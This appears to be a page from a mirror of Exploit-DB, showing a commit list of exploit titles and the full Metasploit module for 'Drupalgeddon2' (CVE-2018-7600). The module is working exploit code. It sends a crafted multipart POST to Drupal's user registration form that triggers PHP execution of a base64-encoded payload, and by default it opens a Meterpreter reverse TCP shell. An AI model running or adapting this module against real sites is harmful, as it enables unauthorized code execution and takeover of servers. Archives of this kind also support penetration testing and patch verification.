bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/remote/44482.rb
Offensive Security d0cba5625f DB: 2018-04-18 
12 changes to exploits/shellcodes

Brave Browser < 0.13.0 -  'long alert() argument' Denial of Service
Brave Browser < 0.13.0 -  'window.close(self)' Denial of Service
AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution
Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)
D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)

Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
Drupal  < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)

Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution

Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
2018-04-18 05:01:47 +00:00

102 lines
No EOL
3.2 KiB
Ruby
Executable file
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Drupalgeddon2',
'Description' => %q{
CVE-2018-7600 / SA-CORE-2018-002
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1
allows remote attackers to execute arbitrary code because of an issue affecting
multiple subsystems with default or common module configurations.
The module can load msf PHP arch payloads, using the php/base64 encoder.
The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'
},
'License' => MSF_LICENSE,
'Author' =>
[
'Vitalii Rudnykh', # initial PoC
'Hans Topo', # further research and ruby port
'José Ignacio Rojo' # further research and msf module
],
'References' =>
[
['SA-CORE', '2018-002'],
['CVE', '2018-7600'],
],
'DefaultOptions' =>
{
'encoder' => 'php/base64',
'payload' => 'php/meterpreter/reverse_tcp',
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => [ARCH_PHP],
'Targets' =>
[
['User register form with exec', {}],
],
'DisclosureDate' => 'Apr 15 2018',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']),
])
register_advanced_options(
[
])
end
def uri_path
normalize_uri(target_uri.path)
end
def exploit_user_register
data = Rex::MIME::Message.new
data.add_part("php -r '#{payload.encoded}'", nil, nil, 'form-data; name="mail[#markup]"')
data.add_part('markup', nil, nil, 'form-data; name="mail[#type]"')
data.add_part('user_register_form', nil, nil, 'form-data; name="form_id"')
data.add_part('1', nil, nil, 'form-data; name="_drupal_ajax"')
data.add_part('exec', nil, nil, 'form-data; name="mail[#post_render][]"')
post_data = data.to_s
# /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
send_request_cgi({
'method' => 'POST',
'uri' => "#{uri_path}user/register",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'vars_get' => {
'element_parents' => 'account/mail/#value',
'ajax_form' => '1',
'_wrapper_format' => 'drupal_ajax',
}
})
end
##
# Main
##
def exploit
case datastore['TARGET']
when 0
exploit_user_register
else
fail_with(Failure::BadConfig, "Invalid target selected.")
end
end
end
Reference in a new issue View git blame Copy permalink